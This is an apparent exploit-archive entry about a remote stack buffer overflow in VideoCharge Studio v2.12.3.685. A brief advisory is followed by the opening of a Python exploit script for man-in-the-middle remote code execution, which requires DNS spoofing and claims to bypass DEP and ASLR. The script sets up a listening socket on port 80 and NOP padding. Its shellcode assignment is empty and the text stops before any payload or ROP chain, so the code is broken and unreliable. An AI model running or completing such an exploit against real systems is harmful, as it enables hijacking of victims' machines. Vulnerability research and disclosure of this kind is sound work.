VideoCharge Studio - 'CHTTPResponse::GetHttpResponse()' Remote Stack Buffer Overflow

Julien Ahrens 2014-02-19 remote windows

VideoCharge Studio is prone to a remote stack-based buffer-overflow vulnerability because the software fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.

Successful exploits allow remote attackers to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts likely result in denial-of-service conditions.

VideoCharge Studio is vulnerable; other versions may also be affected. 

# Exploit Title: VideoCharge Studio v2.12.3.685 cc.dll GetHttpResponse() 
MITM Remote Code Execution Exploit (SafeSEH/ASLR/DEP Bypass)
# Version:       v2.12.3.685
# Date:          2014-02-18
# Author:        Julien Ahrens (@MrTuxracer)
# Homepage:
# Software Link:
# Tested on:     Win7-GER (DEP enabled)
# Howto / Notes:
# Since it's a MITM RCE you need to spoof the DNS Record for in order to successfully exploit this vulnerability
from socket import *
from struct import pack
from time import sleep
host = ""
port = 80
s = socket(AF_INET, SOCK_STREAM)
s.bind((host, port))
print "\n[+] Listening on %d ..." % port
cl, addr = s.accept()
print "[+] Connection accepted from %s" % addr[0]
# Thanks Giuseppe D'Amore for the amazing shellcode
shellcode = 
junk0 = "\x90" * 1277
junk1 = "\x90" * 1900
nops="\x90" * 30